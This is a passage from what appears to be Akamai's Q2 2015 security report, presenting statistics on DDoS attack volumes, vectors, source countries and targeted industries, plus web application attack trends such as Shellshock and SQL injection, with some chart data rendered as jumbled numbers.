• 132.43% increase in total DDoS attacks
• 122.22% increase in application layer (Layer 7) DDoS attacks
• 133.66% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
• 18.99% increase in the average attack duration: 20.64 vs. 17.35 hours
• 11.47% decrease in average peak bandwidth
• 77.26% decrease in average peak volume
• 100% increase in attacks > 100 Gbps: 12 vs. 6
Compared to q1 2015• 7.13% increase in total DDoS attacks
• 17.65% increase in application layer (Layer 7) DDoS attacks
• 6.04% increase in infrastructure layer (Layer 3 & 4) DDoS attacks
• 16.85% decrease in the average attack duration: 20.64 vs. 24.82 hours
• 15.46 increase in average peak bandwidth
• 23.98% increase in average peak volume
• 50% increase in attacks > 100 Gbps: 12 vs. 8
• As in q 1 2015, China is the quarter’s top country producing DDoS attacks
7 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
them attractive for use as ssdp  reflectors. Practically unseen a year ago, ssdp  attacks 
have been one of the top attack vectors for the past three quarters. syn  floods have 
continued to be one of the most common vectors in all volumetric attacks, dating 
back to the first edition of these security reports in q 3 2011.
We’ve also seen significant growth in the number of multi-vector attacks, with half 
of all DDoS attacks employing at least two methods in q 2 2015. Multi-vector attacks 
often leverage attack toolkits from the DDoS-for-hire framework. One specific 
combination of vectors has appeared repeatedly in attacks greater than 100 Gbps: 
the simultaneous use of syn  and udp  reflection-based vectors. These attacks are 
profiled in more detail in Section 2 of this report.
During q2 2015, the online gaming sector was once again the most frequent 
target of DDoS attacks. Online gaming has remained the most targeted industry 
since q 2 2014. 
As has been the case in recent quarters, many DDoS attacks were fueled by malicious 
actors such as DD4BC and copycats utilizing similar methodologies. These 
actors use DDoS as a means of extortion, to gain media attention and notoriety from peer groups, or to damage reputations and cause service disruptions in a 
number of industries.
When looking at Layer 7 DDoS attack traffic, we track the last hop ip address of 
DDoS attacks against the national ip ranges. In the latest analysis, China remained 
the top producer of non-spoofed DDoS attack traffic at 37%, compared to 23% last 
quarter. The us was the second-largest source of attacks at 17%, with the uk coming in third with 10% of all attacks. All three countries showed significant growth in the 
number of attacks originating from within their borders, with each showing a 50% 
increase compared with the previous quarter. [SECTION]1 = ANALYSIS + EMERGING TRENDS
8 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Last quarter, we began reporting on web application attacks across the Akamai 
Edge network for the first time, reporting on seven common attack vectors. For the 
second quarter of 2015, we have added two new attack types: cross-site scripting 
(xss) and Shellshock. Of the 352.55 million attacks we analyzed, Shellshock, a Bash bug vulnerability first tracked in September 2014, was leveraged in 49% of the 
attacks. However, the majority of the Shellshock attacks targeted a single customer 
in the financial services industry. 
Other than Shellshock, sql  injection (SQLi) and local file include (lfi) attacks 
remained the top application attack vectors, as they were in the previous report. 
The retail and financial services industries remained the most frequent target of web application attacks.
Each quarter, we report on emerging threats to provide better insight into the overall 
threat landscape. In q 1, we explained how malicious actors were exploiting third-
party website plugins for website defacement. This quarter, we took a closer look at 
plugin security in general and uncovered 49 previously unreported vulnerabilities 
with third-party WordPress plugins. These are detailed in Section 3 of this report.
Additionally, we often receive questions from customers on whether to allow traffic 
from Tor exit nodes. Tor provides anonymity for users by routing traffic through 
several cooperating nodes before existing to the public Internet in order to mask the source ip of the user. This cloak of anonymity makes it attractive for people wishing 
to avoid surveillance, which of course includes malicious actors. In Section 4, we analyze how frequently Tor exit nodes were used for malicious purposes and provide guidance on what factors to consider when deciding whether to allow 
traffic from Tor exit nodes.
In q2 2015, Akamai also tracked a number of new attack techniques, vulnerabilities 
and criminal operation campaigns that warranted the release of threat advisories. 
These are profiled in more detail in Section 5 of the report. They include:  [SECTION]1 = ANALYSIS + EMERGING TRENDS
9 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
• An OurMine Team attack exceeding 117 Gbps
• The resurgence of RIPv1 reflection DDoS attacks
• Third-party WordPress plugin vulnerabilities
• The Logjam vulnerability 
• Ongoing attacks from DD4BC
1.1 / DDoS Activity / The second quarter of 2015 was marked by a 132% increase 
in DDoS attacks compared with the same period last year. This included a 122% increase in application layer DDoS attacks and a 134% increase in infrastructure 
layer DDoS attacks. While the attacks were not quite as large as last year, they lasted 
an average of three hours longer and increased in frequency and complexity.
The changes in DDoS activity quarter over quarter are typically more modest. In 
q2, we saw a 7% increase in total DDoS attacks compared with q 1, and an average 
four-hour decrease in attack duration. 
While application layer DDoS attacks continued to account for about 10% of all 
DDoS attacks, they’re growing much more rapidly than infrastructure attacks, with 
an 18% increase in the number of attacks over the previous quarter. The infrastructure layer grew at less than half that rate, with a 6% increase. 
At 16%, syn  traffic surpassed ssdp  traffic, but just barely. This was mostly due to a 
drop in ssdp  traffic, from 21% last quarter to just under 16% this quarter. 
1.1
A / DDoS Attack Bandwidth, Volume and Duration / The number of 
DDoS attacks has steadily increased quarter by quarter, though the median peak 
attack bandwidth and volume has continued to drop since the third quarter of 2014. 
This quarter, average peak attack bandwidth was 7 Gbps, lower than the average peak of nearly 8 Gbps seen in q 2 2014 and slightly up from the 6 Gbps average 
in q1 2015.      [SECTION]1 = ANALYSIS + EMERGING TRENDS
10 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
 [SECTION]1 = ANALYSIS + EMERGING TRENDS
Packet per second attack volume dropped significantly compared with q 2 2014, 
when the average peak was a record-setting 12 Mpps. But compared to last 
quarter, the average peak attack volume was up slightly, 3 Mpps as compared 
to 2 Mpps.      
In q2 2015, the average DDoS attack lasted nearly 21 hours. That represents a 19% 
increase in attack duration compared with q 2 2014, but a 17% decrease in attack 
duration compared with q 1 2015.
The trends of the past two quarters show that malicious actors are favoring attacks 
with lower peak bandwidth, but are launching more frequent and longer attacks 
than they did a year ago. 
1.1B / Mega Attacks / In q 2 2015, 12 DDoS attacks registered more than 100 Gbps, 
as shown in Figure 1-1. This is up from q 1 2015, when there were eight mega attacks, 
but still not as many as the record-setting 17 mega attacks of q 3 2014.
In q2 2015, the largest DDoS attack measured nearly 250 Gbps, an increase in size 
from the largest (170 Gbps) attack in q 1 2015. Of the 12 mega attacks, the Internet 
and telecom sector received the largest share of attacks, albeit indirectly. The 10 
attacks listed as Internet and telecom were actually targeting gaming sites hosted on the customer network.     
In q1 2015, the 170 Gbps attack was generated a multi-vector volumetric attack that 
used the same padded syn  flood, along with a udp  fragment flood and a udp  flood 
as seen in this quarter’s largest attack. 
That is compared with q 2 2014, when the most significant attack was measured by 
packet per second volume. That attack was a dns  amplification attack out of China 
that peaked at 110 Mpps.
11 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
In q2 2015, five attacks peaked at more than 50 Mpps, as shown in Figure 1-2. Attack 
campaigns of this volume can exhaust ternary content addressable memory (tcam) 
resources in border edge routers, such as those used by Internet service providers 
(ISPs). This can result in packet loss, while stressing the cycles of the router’s central processing unit (cpu). This can then result in collateral damage across the 
ISP’s network, which can manage production traffic for hundreds or thousands 
of organizations.260
240220200180160140120100
80604020
0
3-Apr
13:12
4-Apr
4:58
8-Apr
5:32
9-Apr
3:40
11-Apr
3:30
18-Apr
4:44
24-Apr
3:25
25-Apr
14:15
30-Apr
6:03
1-May
14:25
4-May
6:51
18-May
20:15Internet/Telecom GamingGbps
Attacks Date and Starting Time (GMT)249
144
106 109144210
118157145
126121
115Q2 2015 Attacks > 100 Gbps
  Figure 1-1: Ten of the mega attacks targeted the Internet and telecom industry  [SECTION]1 = ANALYSIS + EMERGING TRENDS
12 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The 214 Mpps attack on June 12 was one of the three largest DDoS attacks ever 
recorded across the Prolexic Routed network. The attack was based on a udp  flood 
with 1-byte packets — the smallest possible payload — and it generated 70 Gbps of 
attack traffic.
The 80 Mpps on May 15 was a little more complex, based on a Christmas tree DDoS 
flood, with every tcp  flag turned on, targeting two /24 subnets over ports 80 and 443. 
As the attack continued, the attacker varied the tcp  flag sequence configurations, 
while using an average payload size of 14-byte packets. [SECTION]1 = ANALYSIS + EMERGING TRENDS
220
200180160140120100
80604020
0
7-Apr
11:54
24-Apr
3:25
15-May
23:10
8-June
4:51
12-June
10:52Internet/Telecom High Tech / Consulting Services GamingMpps
Attack Date and Starting Time (GMT)63.09 60.4679.62
52.68214.35Q2 2015 Attacks > 50 Mpps
  Figure 1-2: Several of the Q2 2015 mega attacks specifically targeted the TCAM 
limitations in tier 1 ISP routers
13 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1.1C / DDoS Attack Vectors / In q 2 2015, syn  floods represented the top overall 
infrastructure-based attack (16%), bypassing ssdp  by a razor-thin margin. ssdp  was 
the top attack vector in q1 2015 and q4 2014. In q2, ssdp  attacks represented just 
under 16% of all attacks. This vector first appeared in q 3 2014 and has not been 
subject to the same cleanup efforts as ntp and dns , since many ssdp  reflection 
attacks are leveraging unsecured in-home consumer devices. These attacks have 
two victims: the owners of the devices used as reflectors and the actual attack target. These owners are typically home users who are unlikely to realize that their devices 
are participating in attacks. Even if they do notice slowness in their networks, they 
may not have the expertise to troubleshoot, mitigate or detect the cause.
Figure 1-3 displays the frequency of observed attack vectors at the DDoS layer. [SECTION]1 = ANALYSIS + EMERGING TRENDS
14 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
PercentageInfrastructure DDoS Layer Application DDoS Layer0 5 10 15 20
PUSHHTTP POSTHEADHTTP GETOtherNTPUDP
FRAGMENTUDP
FLOODSSYNSSDPRESETICMPDNSCHARGENACK 2.14%
6.42%
8.74%
2.56%
1.02%
15.86%
16.00%
11.49%
13.63%
9.44%
2.46%
8.74%
0.70%
0.37%
0.42%
FIN FLOODS (0.79%)
RIP (0.09%), XMAS (0.42%)RP (0.37%), SNMP (0.65%)SYN PUSH (0.14%)
Application
DDoS Layer
10.23%
Infrastructure
DDoS Layer
89.77%
  Figure 1-3: Nearly 90% of DDoS attacks targeted infrastructure layer in Q2 2015, 
a trend that has continued for the past yearDDoS Attack Vector Frequency, Q2 2015 [SECTION]1 = ANALYSIS + EMERGING TRENDS
15 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Infrastructure-based attacks accounted for the lion’s share of DDoS activity in the 
second quarter. Application layer DDoS attacks accounted for 10% of all activity, 
while the infrastructure layer experienced 90% of DDoS attacks, down slightly 
from 91% in q 1. This trend of mostly infrastructure attacks has continued for more 
than one year, as attackers have relied more and more on reflection vectors as the 
primary DDoS attack method. Not only do these reflection attacks obscure the true 
ip addresses of the attackers, they also require fewer attack resources relative to the size of the attack. 
That said, DDoS attack scripts on the application side have been shifting more 
towards the use of non-botnet based resources, such as attack scripts that leverage open proxies on the Internet. This trend, along with the continued abuse of 
WordPress and Joomla-based websites as get  flood sources, may pave the way to 
a continued increase in application-based reflected DDoS attacks that abuse web 
application frameworks.
1.1
D / Infrastructure Layer vs. Application Layer DDoS Attacks / 
ssdp  attacks accounted for a little less than 16% of all attacks, while syn  floods 
accounted for 16% of attacks. As the 100+ Gbps attacks show, the syn  flood attack 
plays a major role in the larger attacks. udp  floods accounted for 11%, while udp  
fragments accounted for 14%. As stated in previous reports, the fragments are 
sometimes a byproduct of other infrastructure-based attacks. In particular, udp-
based chargen and dns  reflection attacks together accounted for just over 15% 
of attacks.       
By comparison, in q 2 2014 the most used infrastructure-based attack vectors were 
syn floods (26%), udp  fragment (13%), udp floods (11%) and dns attacks (8%). 
Additionally that quarter, ntp attacks accounted for 7%, chargen for 5%, icmp for 
7%, and ack  floods for 5%. ssdp  and syn  have continued to gain popularity since it 
was first observed back in q 3 2014. [SECTION]1 = ANALYSIS + EMERGING TRENDS
16 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
At the application layer, http get flood attacks came in at 7.5% head , http post and 
push attacks accounted for less than 2% each. Many of the get  flood attacks were 
based on a combination of the Joomla, WordPress and get  flood attacks via proxy.
http get floods have been consistently favored by attackers targeting the application 
layer. The top application-layer DDoS attack in q 4 2014 was http get floods, which 
was the case as well in q 1 2014.
A full comparison of attack vector frequency is shown in Figure 1-4 and Figure 1-5.   [SECTION]1 = ANALYSIS + EMERGING TRENDS
 Figure 1-4: The 10 most common attack vectors over the past five quarters ACK4.86%
4.54%
3.92%
5.20%
5.78%
6.42%
8.11%
7.42%
10.51%
5.93%
8.74%
7.46%
8.90%
8.42%
7.47%
8.74%
6.59%
4.18%
8.05%
3.59%
2.56%
7.35%
4.56%
8.15%
6.88%
9.44%
7.31%
14.62%
20.78%
15.86%
25.73%
23.09%
16.91%
15.79%
16.00%
11.24%
15.25%
10.58%
13.25%
11.49%
13.41%
13.88%
13.95%
12.01%
13.63%3.81%
2.77%
1.99%
2.14%
CHARGEN
DNS
HTTP GET
ICMP
NTP
SSDP
SYN
UDP 
FLOODS
UDP 
FRAGMENT
0 5 10 15 20 25 30Q2 2014 Q3 2014 Q4 2014 Q1 2015 Q2 2015DDoS Attack Vector Frequency by Quarter
FIN FLOODS
FIN PUSH
HEAD
HTTP POST
IGMP 
FRAGMENT
PUSH
RESET
RIP
RP
SNMP
SYN PUSH
TCP 
FRAGMENT
XMAS
0.0 0.5 1.0 1.5 2.0 2.5 3.0
  Figure 1-5: These 13 attack vectors have been seen less frequently during the past 
five quarters DDoS Attack Vector Frequency by Quarter
Q2 2014 Q3 2014 Q4 2014 Q1 2015 Q2 2015
2.05%
2.27%
3.03%0.43%
0.11%
0.11%0.76%
1.30%
0.22%0.11%0.22%0.11%0.42%
0.53%
0.21%0.11%
0.42%0.64%
0.64%
0.65%0.21%0.27%
1.15%
0.67%
0.27%0.40%
0.07%
0.07%0.54%
0.94%0.20%0.13%0.79%
0.37%
0.65%
0.42%0.37%
0.14%0.42%
1.02%
0.09%0.70%0.75%
0.70%
1.15%
1.15%0.45%
0.35%
0.05%0.90%0.25%0.15%
19 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1.1E / Top 10 Source Countries / China remained the top producer of non-
spoofed DDoS attack traffic at 37% compared to 23% last quarter. The us was the 
second-largest source of attacks (17%), with the uk coming in third (10%). All three 
countries showed significant growth in the number of attacks originating from within their borders, with each showing a 50% increase over the previous quarter.
There is a considerable gap between the leaders and the rest of the pack with roughly 
7% of attack traffic originating from India, while traffic from the Korean Peninsula, 
Russia and Germany had a combined 13%, with each region contributing a little more than 4% respectively. Australia and Taiwan made the top 10 for the first time, 
though attack traffic from both countries only registered 4% apiece. Australia’s 
appearance on the list is likely due to the increase adoption of high speed internet access throughout NBN and connectivity of IOT devices in the region. Taiwan 4%
Australia 4.18%
Germany 4.29%
RussianFederation 4.45%
Korea 4.53%
 
US
17.88%China
37.01%
UK
10.21%India
7.43%Spain
6.03%
  Figure 1- 6: Non-spoofed attacking IP addresses by source country, for DDoS attacks 
mitigated during Q2 2015Top 10 Source Countries for DDoS Attacks, Q2 2015  [SECTION]1 = ANALYSIS + EMERGING TRENDS
20 
akamai’s [state of the internet] security / Q2 2015 / www.stateoftheinternet.com [SECTION]1 = ANALYSIS + EMERGING TRENDS
Taiwan
Australia
Germany
Russia
Korea
Spain
India
UK
US
ChinaQ2
2015
0 10% 20% 30% 40%
Russia
France
UK
Korea
India
Spain
Italy
US
Germany
ChinaQ1
2015
0 10% 20% 30% 40%4.00%
4.18%
4.29%
4.45%
4.53%
6.03%
7.43%
10.21%
17.88%
37.01%
5.95%
6.03%
6.17%
6.23%
6.93%
7.29%
8.38%
12.18%
17.39%
23.45%
Thailand
Russia
Turkey
Brazil
India
Mexico
Germany
China
Japan
USQ2
2014
0 10% 20% 30% 40%4.44%
4.87%
5.16%
7.94%
8.26%
8.31%
10.30%
12.30%
18.16%
20.26%
  Figure 1-7: The US and China typically are among the top three non-spoofed sources 
for attacking IPs Top 10 Source Countries for DDoS Attacks by Quarter
21 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
 [SECTION]1 = ANALYSIS + EMERGING TRENDS
1.1F / Target Industries / The online gaming sector was particularly hard hit 
in q2 2015, accounting for more than 35% of all attacks. Gaming was followed by 
software and technology, which suffered 28% of all attacks, as shown in Figure 1-8. 
Internet and telecom suffered 13% of attacks, followed by financial services (8%), media and entertainment (9%), education (3%), retail and consumer goods (3%), 
and the public sector (1%).  
Online gaming / Online gaming has remained the most targeted industry since q 2 
2014 and remained steady at 35% compared to last quarter. In q 4 2014, attacks were 
fueled by malicious actors seeking to gain media attention or notoriety from peer 
groups, damage reputations and cause disruptions in gaming services. Some of the largest console gaming networks were openly and extensively attacked in December 
2014, when more players were likely to be affected due to the new networked games 
launched for the holiday season.       
Software and technology / The software and technology industry includes 
companies that provide solutions such as Software-as-a-Service (SaaS) and cloud- 
based technologies. This industry saw a slight 2% drop in attack rates compared to last quarter.
Internet and telecom / The Internet and telecom industry includes companies that 
offer Internet-related services such as ISPs and dns  providers. It was the target of 
13% of attacks, a 1% drop over the previous quarter.
Financial services / The financial industry includes major financial institutions such 
as banks and trading platforms. The financial industry saw a small (less than 1%) drop in attacks from the previous quarter. While overall there was a slight reduction 
in attacks targeting this industry, it’s worth mentioning that they still saw some of 
the larger attacks (100+ Gbps) of the quarter.    
Media and entertainment / The media industry saw a slight increase in the 
percentage of attacks, from 7% in q 1 2015 to 9% in q 2 2015.
22 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1.1G / DDoS Attacks — A Two-Year Look Back / Figure 1-9 shows DDoS attack 
size as a function of time. A box and whiskers plot is used to show the measure 
of central tendency. The dark line in the box shows the median attack size. Fifty 
percent of the observed attacks were larger than the median and 50% of the observed attacks were smaller than the median. The box shows the interquartile range (iqr ): 
Both boxes together encompass 50% of all attacks, with 25% of the attacks situated above the box and 25% of the attacks represented below the box. Each attack that took place during a given quarter is displayed as a dot so we can observe the size of 
individual attacks.  [SECTION]1 = ANALYSIS + EMERGING TRENDS
Education
Financial Services
Gaming
Hotel & Travel
Internet & Telecom
Media & Entertainment
Public Sector
Retail & Consumer Goods
Software & Technology
0% 5% 10% 15% 20% 25% 30% 35% 40%Q2 2015 Q1 2015
4.93%
2.50%
8.40%
0.87%
13.77%
12.90%
7.45%
9.41%
1.82%
1.05%
2.25%
2.60%
25.19%
27.74%0.41%35.32%
35.20%8.19%DDoS Attack Frequency by Industry
 Figure 1- 8: The gaming industry remains a top target for malicious actors 
23 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Before we dive into the shape of the data, here are a few quick points to be aware of.
1.  We’re making a conscious choice to use the median to describe an average 
attack rather than the mean. The median is much more resilient to the presence 
of outliers because it represents the point where 50% of all attacks are larger or 50% are smaller. 
2.  The set of observed DDoS attacks include an enormous number of small attacks and a few large ones. For legibility purposes, we’re choosing to use a logarithmic scale, which each interval representing a 10-fold increase.
3.   There is a notch in each of the boxes centered on the median. The notches show confidence intervals for the median. If the notches for two consecutive boxes overlap, then there is not a statistically significant difference in the median attack 
size, as is exemplified by the fourth quarter of 2014 through the current quarter.
Looking at the time series, a few patterns stand out. First, a significant increase in 
attack size occurred in q 1 2014. The first four quarters we tracked (q 1 – q4 2013) 
look similar to one another. The upper boundary of the iqr  is roughly the same and 
three of the four medians are statistically similar.
However, things changed between q 4 2013 and q 1 2014. The upper bound of the 
iqr increased dramatically (recall, this is a logarithmic scale), as has the median 
attack size. In q 4 2014, things change once again. This time we see a statistically 
significant drop in the upper bound of the iqr , however, the median attack size 
remained unchanged. The size of the large attacks appears to be clumping closer 
to the median.   [SECTION]1 = ANALYSIS + EMERGING TRENDS
24 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1.2 / Kona Web Application Firew all Activity / For the q 2 2015 report, we 
concentrated our analysis on nine common web application attack vectors. They 
represent a cross section of many of the most common categories seen in industry 
vulnerability lists. Akamai’s goal was not to validate any one of the vulnerability lists, but instead to look at some of the characteristics of these attacks as they transit 
a large network. As with all sensors, the data sources used by Akamai have different 
levels of confidence; for this report, we focused on traffic where Akamai has a high confidence in the low false-positive rate of its sensors. Other web application attack 
vectors are excluded from this section of the report. 
SQLi  / sql injection is an attack where adversary-supplied content is inserted 
directly into a sql statement before parsing, rather than being safely conveyed post-
parse via a parameterized query.       LFI / Local file inclusion is an attack where a malicious user is able to gain 
unauthorized read access to local files on the web server. [SECTION]1 = ANALYSIS + EMERGING TRENDS
DDoS Size as a Function of Time
100 Gbps
10 Gbps
1 Gbps
100 Mbps
10 Mbps
1 Mbps
100 Kbps
Q1 
2013Q2 
2013Q3 
2013Q4 
2013Q1 
2014Q2 
2014Q3 
2014Q4 
2014Q1 
2015Q2 
2015
  Figure 1-9: The IQR chart is on a logarithmic scale and shows significant shifts in DDoS 
attack size and frequency over the past 10 quarters 
25 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
RFI / Remote file inclusion is an attack where a malicious user abuses the dynamic 
file include mechanism, which is available in many web frameworks, and loads 
remote malicious code into the victim web application.
PHPi / php injection is an attack where a malicious user is able to inject php code 
from the request itself into a data stream, which gets executed by the php  interpreter, 
such as by use of the eval()  function.
CMDi / Command injection is an attack that leverages application vulnerabilities 
to allow a malicious user to execute arbitrary shell commands on the 
target system.  
JAVA i  /  Java injection is an attack where a malicious user injects Java code, such 
as by abusing the Object Graph Navigation Language (ognl), a Java expression 
language. This kind of attack became very popular due to recent flaws in the Java-based Struts Framework, which uses ognl extensively in cookie and query 
parameter processing. 
MFU / Malicious file upload (or unrestricted file upload) is a type of attack where a 
malicious user uploads unauthorized files to the target application. These potentially 
malicious files can later be used to gain full control over the system. 
XSS / Cross-site scripting is an attack that allows malicious actor to inject client-
side code into web pages viewed by other. When an attacker gets a user’s browser to 
execute his/her code, the code will run within the security context (or zone) of the 
hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser.
Shellshock / Disclosed in September 2014, Shellshock (CVE-2014-6271) is a 
vulnerability in the Bash shell (the default shell for Linux and mac os x) that allows for arbitrary command execution by a remote attacker. The vulnerability had existed 
in Bash since 1989, and the ubiquitous presence of Bash makes the vulnerability a 
tempting target. [SECTION]1 = ANALYSIS + EMERGING TRENDS
26 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
1.2A / Web Application Attack Vectors / This quarter, we added two new 
data points to the web application attacks we are reporting on: xss and Shellshock.  
Including events based on Shellshock nearly doubled the number of attack events we 
analyzed this quarter, with 173 million Shellshock attacks against Akamai customers in this quarter alone. Shellshock also significantly shifted the balance of attacks over 
http vs. https, in large part because these attacks happen 20 times more often over 
https than they do over unencrypted channels. Luckily, Shellshock exploitation attempts appear to be declining. Where Shellshock accounted for nearly 95% of 
all events over https in April, by the end of July, it accounted for slightly more 
than 5% of all events. Overall, Shellshock accounted for 49% of web application attacks in q 2 2015.
Looking closely at the Shellshock attack data, we noticed that approximately 95% of the Shellshock attacks were related to a single worldwide campaign against a large financial services customer. The attack was highly distributed and the top 
source countries were China (78.4%), Taiwan (5.09%), us (2.86%), Brazil (2.53%), 
and Indonesia (1.01%).
SQLi attacks came in a distant second, accounting for 26% of all attacks. If Shellshock 
is discounted from the numbers, SQLi would have been 55% of attacks, with more 
than 92 million attacks in the quarter. This represents a greater than 75% increase in SQLi alerts in the second quarter alone.
In contrast, lfi attacks dropped significantly this quarter. In the last week of q1, we 
saw nearly 75 million lfi alerts due to an attack on a pair of large retail customers, 
while in all of q 2 we only saw 63 million alerts. lfi accounted for 18% of all alerts if 
we include the new categories, but for 38% of attacks if Shellshock and xss attacks are not included. [SECTION]1 = ANALYSIS + EMERGING TRENDS
Shellshock, SQLi and lfi attacks combined accounted for 93% of all web application 
attacks in the second quarter, with the remaining six categories accounting for 7% 
in total. Protecting your organization against these three attack types should be 
heavily considered.
1.2B / Web Application Attacks Over HTTP vs. HTTPS / Among the web 
application attacks analyzed for the q 2 2015 report, 156 million were sent over 
(unencrypted) http . This represented 44% of the application attacks.
Given that a large percentage of websites either do not use https for all of their 
web traffic, or use it only for safeguarding certain sensitive transactions (such as 
login requests), the comparison between http vs. https should be used only for 
understanding attack trends between the two communication channels. 
That said, encrypted connections (over https) do not provide any additional attack 
protection for applications. There is no reason to believe that the attackers would 
not have followed a shift of the vulnerable applications to https. There were 196 
million attacks over https observed during the quarter, making up 56% of the 
attacks. Figure 1-10 shows the ratio between https and http attacks. [SECTION]1 = ANALYSIS + EMERGING TRENDS
44% 56%HTTP HTTPS
 Figure 1-10: The majority of web application attacks were sent over HTTPS in Q2Total Attacks, HTTP vs. HTTPS, Q2 2015
27 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
28 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
Of the 196 million attacks over https, the most prevalent attack vectors were 
Shellshock (49%), and SQLi (26%). https-based lfi attacks accounted for 18% while 
PHPi attacks accounted for 1.5%. CMDi, JAV Ai, rfi  and mfu attacks accounted for 
less than 1% each. The weekly breakdown of attack vectors is shown in Figure 1-11 and Figure 1-12.
Week 13
Week 14
Week 15
Week 16
Week 17
Week 18
Week 19
Week 20
Week 21
Week 22
Week 23
Week 24
0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100%SQLi LFI RFI PHPi CMDi JAVAi MFU XSS ShellshockWeb Application Attack Vectors (HTTPS), Q2 2015
  Figure 1-11: Shellshock was a heavily favored attack vector over HTTPS in Q2 2015  [SECTION]1 = ANALYSIS + EMERGING TRENDS
29 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
When comparing https-based attacks in each category, against the total in each 
category we can see that Shellshock alerts are almost 96% https traffic and only 4% 
unencrypted. By contrast, SQLi attacks are carried out over https only 10% of the 
time, with 90% of the attacks taking place in plain http traffic. rfi  is also heavily 
http-based, with only 25% of the alerts from traffic over https.
1.2C / Top 10 Source Countries / For the web application attacks analyzed in this 
section, China was the top source country of attacking IPs (51%), followed by the us  
(15%), Brazil (11%), Germany (7%), Russia (6%), Taiwan (3%) and the Netherlands, 
Ukraine and Indonesia (2% each). Ireland is at the bottom with 1% of attacks. Due to the use of tools to mask the actual location, the creator of the attack traffic may 
not have been located in the country detected. These IPs represent the last hop seen. [SECTION]1 = ANALYSIS + EMERGING TRENDS
Week 13
Week 14
Week 15
Week 16
Week 17
Week 18
Week 19
Week 20
Week 21
Week 22
Week 23
Week 24
0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100%SQLi LFI RFI PHPi CMDi JAVAi MFU XSS ShellshockWeb Application Attack Vectors (HTTP), Q2 2015
  Figure 1-12: SQLi and LFI were the most prevalent attack vectors over HTTP in Q2 2015 
30 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
The web application attacks analyzed here occur after a tcp  session is established. 
Therefore, the geographic origins of the attack traffic can be stated with high 
confidence. Countries with a higher population and higher internet connectivity 
are often seen to be the source of attack traffic.
1.2D / Top 10 Target Countries / us-based websites were by far the most 
targeted for web application attacks in q 2 2015, receiving about 80% of all attacks. 
Brazilian-based websites came in a distant second with 7% of attack traffic. Chinese 
websites were the third most targeted at 4%, followed by Spanish sites at 2%. Sweden, Canada, Australia, uk, India and Germany-based websites were each targeted in 1% 
of attacks, as shown in Figure 1-14. [SECTION]1 = ANALYSIS + EMERGING TRENDS
  Figure 1- 13: The top three source countries combined were responsible for 77% of 
attacking IPsTop 10 Source Countries for Web Application Attacks, 
Q2 2015
Ireland 1%
Indonesia 2%
Ukraine 2%
Netherlands 2%
Taiwan 3%
Russian Federation 6%
Germany 7%
 US
15%China
51%Brazil
11%
31 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
 [SECTION]1 = ANALYSIS + EMERGING TRENDS
1.2E / A Normalized View of Web Application Attacks by Industry / 
Akamai has long tracked DDoS attacks at both the application and network layer, 
and DDoS attack statistics are typically the most commented on, reprinted, and 
discussed stats that we produce. Over the years, customers have asked for a similar view into the stealthy application layer attacks that plague enterprises, governments 
and others; the attacks that hard-working organizations such as the Open Web 
Application Security Project (owasp ) have typically tracked and ranked according 
to prevalence and danger. 
But figuring out how to give our customers a view of what we see has been a long 
and arduous challenge. Although Akamai has visibility into 15 – 30% of the world’s 
web traffic, the challenge in meeting this goal has been threefold: how to store the data we see, how to query it, and finally, how to report on it meaningfully.
Methodology / In the past two years, we’ve made great progress in tackling the first 
two challenges. Storage, for example, has been largely met by the creation of the 
Cloud Security Intelligence (csi ) platform, which stores more than 2 petabytes (pb ) Germany 1%
India 1%
UK 1%
Australia 1%
Canada 1%
Sweden 1%
Spain 2%
China 4%US
81% Brazil
7%
  Figure 1- 14: The US is consistently one of the top targets for malicious actorsTop 10 Target Countries for Web Application Attacks, 
Q2 2015
32 
akamai’s [state of the internet] / security / Q2 2015 / www.stateoftheinternet.com
of threat intelligence data (the equivalent of 2,000 terabytes). This allows Akamai to 
store more than 10 tb of attack data every day, which gives us roughly 30 – 45 days 
of application layer attack data at any given moment in time. Querying the data has taken a bit more finesse. During the past two years, we’ve hired a number of data scientists, analysts and researchers. Today, those researchers make up the Akamai 
Threat Research team, a team that has set up dozens of heuristics that automatically 
query the stored data on an hourly basis. The insight they extract from the data, feeds improvements to our Kona Site Defender application protections and our 
Client Reputation product. The final challenge is reporting on the data.
Our reporting methodology undertook the following assumptions. We divided all 
Akamai customers into eight verticals. (Note: The verticals we tracked for application 
layer attacks are slightly different than they are for network layer attacks. This is 
because the integration of the Prolexic and Akamai customer tracking systems is a work in progress.) For each of the customers in these eight verticals, we tracked 
the number of malicious requests across the nine categories of attacks featured in 
this report during a 12-week period. The frequency of these attack vectors and the accuracy of the signatures detecting each of the categories, were both given weight 
in the selection of categories. 
In order to normalize samples, we removed every sample that accrued more than 
5% of total attacks in a week in any single attack vector. Doing so helped smooth 
out spikes and what we consider to be anomalies in the data. After adding up all 
